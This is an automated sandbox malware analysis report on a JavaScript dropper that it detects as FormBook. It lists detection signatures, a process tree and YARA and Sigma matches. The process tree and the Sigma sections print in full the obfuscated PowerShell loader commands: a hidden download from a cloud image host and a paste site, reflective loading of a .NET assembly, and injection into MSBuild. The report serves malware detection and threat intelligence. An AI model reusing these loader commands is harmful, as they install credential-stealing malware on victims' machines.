Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1013911.js

Overview

General Information

Sample name:1013911.js
Analysis ID:1567224
MD5:55be1707eaf08b827b66cc78a1e69e16
SHA1:a826394d49fc7ad0e3db1ca040c167ef40ea9bdd
SHA256:bf92cd30b94f0164d738c92a6be0fd7d72e0795d3ab1868cf0ec8ec1e57a201b
Tags:jsStrelaStealeruser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Sigma detected: Paste sharing url in reverse order
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7296 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1013911.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cscript.exe (PID: 7384 cmdline: "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Local\Temp\ostaxa.js MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
      • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7464 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $zooiatrologia = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGEAZAByAGkAZwBhAGwAZQB0AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJAByAGUAbABhAHQAYQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAZAByAG8AIAA9ACAAJAByAGUAbABhAHQAYQByAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AYQBkAHIAaQBnAGEAbABlAHQAZQApADsAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABhAGQAcgBvACkAOwAkAHgAYQBxAHUAZQBjAGEAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGIAcgBpAG0AIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAYwBvAG4AdABlAG4AaABvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAeABhAHEAdQBlAGMAYQApADsAJABjAG8AbABhAHAAcwBvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAYgByAGkAbQApADsAJABjAG8AbgB0AGUAbgBoAG8AIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABjAG8AbABhAHAAcwBvACAALQBnAHQAIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYwBvAG4AdABlAG4AaABvACAAKwA9ACAAJAB4AGEAcQB1AGUAYwBhAC4ATABlAG4AZwB0AGgAOwAkAHEAdQBpAG4AYQBsACAAPQAgACQAYwBvAGwAYQBwAHMAbwAgAC0AIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYQBsAG0AZQBpAGQAaQBuAGEAIAA9ACAAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAYwBvAG4AdABlAG4AaABvACwAIAAkAHEAdQBpAG4AYQBsACkAOwAkAGIAdQBiAGUAbABhACAAPQAgAC0AagBvAGkAbgAgACgAJABhAGwAbQBlAGkAZABpAG4AYQAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAYQBsAG0AZQBpAGQAaQBuAGEALgBMAGUAbgBnAHQAaAApAF0AOwAkAGEAZABqAHUAdABvAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgB1AGIAZQBsAGEAKQA7ACQAcABhAGQAcgBhAHMAdABvACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGEAZABqAHUAdABvAHIAKQA7ACQAbQBhAG4AZAB1AGMAYQByACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQA7ACQAbQBhAG4AZAB1AGMAYQByAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAEAAKAAnADAALwBWAEEAZgB6ADUALwByAC8AZQBlAC4AZQB0AHMAYQBwAC8ALwA6AHMAcAB0AHQAaAAnACwAIAAnAHMAeQBtAHAAbwBzAGkAYQByAGMAaABhACcALAAgACcAcwB5AG0AcABvAHMAaQBhAHIAYwBoAGEAJwAsACAAJwBzAHkAbQBwAG8AcwBpAGEAcgBjAGgAYQAnACwAIAAnAE0AUwBCAHUAaQBsAGQAJwAsACAAJwBzAHkAbQBwAG8AcwBpAGEAcgBjAGgAYQAnACwAIAAnAHMAeQBtAHAAbwBzAGkAYQByAGMAaABhACcALAAnAHMAeQBtAHAAbwBzAGkAYQByAGMAaABhACcALAAnAHMAeQBtAHAAbwBzAGkAYQByAGMAaABhACcALAAnAHMAeQBtAHAAbwBzAGkAYQByAGMAaABhACcALAAnAHMAeQBtAHAAbwBzAGkAYQByAGMAaABhACcALAAnAHMAeQBtAHAAbwBzAGkAYQByAGMAaABhACcALAAnADEAJwAsACcAcwB5AG0AcABvAHMAaQBhAHIAYwBoAGEAJwApACkAOwBpAGYAIAAoACQAbgB1AGwAbAAgAC0AbgBlACAAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUAIAAtAGEAbgBkACAAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAWwB2AG8AaQBkAF0AJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAgAH0AIABlAGwAcwBlACAAewAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJwBQAG8AdwBlAHIAUwBoAGUAbABsACAAdgBlAHIAcwBpAG8AbgAgAE4AbwB0ACAAYQB2AGEAaQBsAGEAYgBsAGUAJwAgAH0AOwBpAGYAIAAoACQAbgB1AGwAbAAgAC0AbgBlACAAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUAIAAtAGEAbgBkACAAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAWwB2AG8AaQBkAF0AJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAgAH0AIABlAGwAcwBlACAAewAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJwBQAG8AdwBlAHIAUwBoAGUAbABsACAAdgBlAHIAcwBpAG8AbgAgAE4AbwB0ACAAYQB2AGEAaQBsAGEAYgBsAGUAJwAgAH0AOwA=';$atomismo = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($zooiatrologia));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $atomismo MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$madrigalete = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$relatar = New-Object System.Net.WebClient;$adro = $relatar.DownloadData($madrigalete);$oftalmoxise = [System.Text.Encoding]::UTF8.GetString($adro);$xaqueca = '<<BASE64_START>>';$brim = '<<BASE64_END>>';$contenho = $oftalmoxise.IndexOf($xaqueca);$colapso = $oftalmoxise.IndexOf($brim);$contenho -ge 0 -and $colapso -gt $contenho;$contenho += $xaqueca.Length;$quinal = $colapso - $contenho;$almeidina = $oftalmoxise.Substring($contenho, $quinal);$bubela = -join ($almeidina.ToCharArray() | ForEach-Object { $_ })[-1..-($almeidina.Length)];$adjutor = [System.Convert]::FromBase64String($bubela);$padrasto = [System.Reflection.Assembly]::Load($adjutor);$manducar = [dnlib.IO.Home].GetMethod('VAI');$manducar.Invoke($null, @('0/VAfz5/r/ee.etsap//:sptth', 'symposiarcha', 'symposiarcha', 'symposiarcha', 'MSBuild', 'symposiarcha', 'symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','1','symposiarcha'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • MSBuild.exe (PID: 8012 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • choice.exe (PID: 8104 cmdline: "C:\Windows\SysWOW64\choice.exe" MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
      • firefox.exe (PID: 1908 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.2951402841.0000000004770000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.2951435333.00000000047C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000009.00000002.2570201674.0000000006950000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000009.00000002.2184961548.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000A.00000002.2950913668.0000000002B00000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              9.2.MSBuild.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Other

                SourceRuleDescriptionAuthorStrings
                amsi64_7616.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                  Sigma Signatures

                  Networking

                  barindex
                  Sigma detected: Paste sharing url in reverse order
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$madrigalete = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$relatar = New-Object System.Net.WebClient;$adro = $relatar.DownloadData($madrigalete);$oftalmoxise = [System.Text.Encoding]::UTF8.GetString($adro);$xaqueca = '<<BASE64_START>>';$brim = '<<BASE64_END>>';$contenho = $oftalmoxise.IndexOf($xaqueca);$colapso = $oftalmoxise.IndexOf($brim);$contenho -ge 0 -and $colapso -gt $contenho;$contenho += $xaqueca.Length;$quinal = $colapso - $contenho;$almeidina = $oftalmoxise.Substring($contenho, $quinal);$bubela = -join ($almeidina.ToCharArray() | ForEach-Object { $_ })[-1..-($almeidina.Length)];$adjutor = [System.Convert]::FromBase64String($bubela);$padrasto = [System.Reflection.Assembly]::Load($adjutor);$manducar = [dnlib.IO.Home].GetMethod('VAI');$manducar.Invoke($null, @('0/VAfz5/r/ee.etsap//:sptth', 'symposiarcha', 'symposiarcha', 'symposiarcha', 'MSBuild', 'symposiarcha', 'symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','1','symposiarcha'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$madrigalete = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$relatar = New-Object System.Net.WebClient;$adro = $relatar.DownloadData($madrigalete);$oftalmoxise = [System.Text.Encoding]::UTF8.GetString($adro);$xaqueca = '<<BASE64_START>>';$brim = '<<BASE64_END>>';$contenho = $oftalmoxise.IndexOf($xaqueca);$colapso = $oftalmoxise.IndexOf($brim);$contenho -ge 0 -and $colapso -gt $contenho;$contenho += $xaqueca.Length;$quinal = $colapso - $contenho;$almeidina = $oftalmoxise.Substring($contenho, $quinal);$bubela = -join ($almeidina.ToCharArray() | ForEach-Object { $_ })[-1..-($almeidina.Length)];$adjutor = [System.Convert]::FromBase64Strin

                  System Summary

                  barindex
                  Sigma detected: Base64 Encoded PowerShell Command Detected
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $zooiatrologia = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGEAZAByAGkAZwBhAGwAZQB0AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJAByAGUAbABhAHQAYQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAZAByAG8AIAA9ACAAJAByAGUAbABhAHQAYQByAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AYQBkAHIAaQBnAGEAbABlAHQAZQApADsAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABhAGQAcgBvACkAOwAkAHgAYQBxAHUAZQBjAGEAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGIAcgBpAG0AIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAYwBvAG4AdABlAG4AaABvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAeABhAHEAdQBlAGMAYQApADsAJABjAG8AbABhAHAAcwBvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAYgByAGkAbQApADsAJABjAG8AbgB0AGUAbgBoAG8AIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABjAG8AbABhAHAAcwBvACAALQBnAHQAIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYwBvAG4AdABlAG4AaABvACAAKwA9ACAAJAB4AGEAcQB1AGUAYwBhAC4ATABlAG4AZwB0AGgAOwAkAHEAdQBpAG4AYQBsACAAPQAgACQAYwBvAGwAYQBwAHMAbwAgAC0AIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYQBsAG0AZQBpAGQAaQBuAGEAIAA9ACAAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAYwBvAG4AdABlAG4AaABvACwAIAAkAHEAdQBpAG4AYQBsACkAOwAkAGIAdQBiAGUAbABhACAAPQAgAC0AagBvAGkAbgAgACgAJABhAGwAbQBlAGkAZABpAG4AYQAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAYQBsAG0AZQBpAGQAaQBuAGEALgBMAGUAbgBnAHQAaAApAF0AOwAkAGEAZABqAHUAdABvAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgB1AGIAZQBsAGEAKQA7ACQAcABhAGQAcgBhAHMAdABvACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGEAZABqAHUAdABvAHIAKQA7ACQAbQ
                  Sigma detected: Net WebClient Casing Anomalies
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $zooiatrologia = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGEAZAByAGkAZwBhAGwAZQB0AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJAByAGUAbABhAHQAYQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAZAByAG8AIAA9ACAAJAByAGUAbABhAHQAYQByAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AYQBkAHIAaQBnAGEAbABlAHQAZQApADsAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABhAGQAcgBvACkAOwAkAHgAYQBxAHUAZQBjAGEAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGIAcgBpAG0AIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAYwBvAG4AdABlAG4AaABvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAeABhAHEAdQBlAGMAYQApADsAJABjAG8AbABhAHAAcwBvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAYgByAGkAbQApADsAJABjAG8AbgB0AGUAbgBoAG8AIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABjAG8AbABhAHAAcwBvACAALQBnAHQAIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYwBvAG4AdABlAG4AaABvACAAKwA9ACAAJAB4AGEAcQB1AGUAYwBhAC4ATABlAG4AZwB0AGgAOwAkAHEAdQBpAG4AYQBsACAAPQAgACQAYwBvAGwAYQBwAHMAbwAgAC0AIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYQBsAG0AZQBpAGQAaQBuAGEAIAA9ACAAJABvAGYAdABhAGwAbQBvAHgAa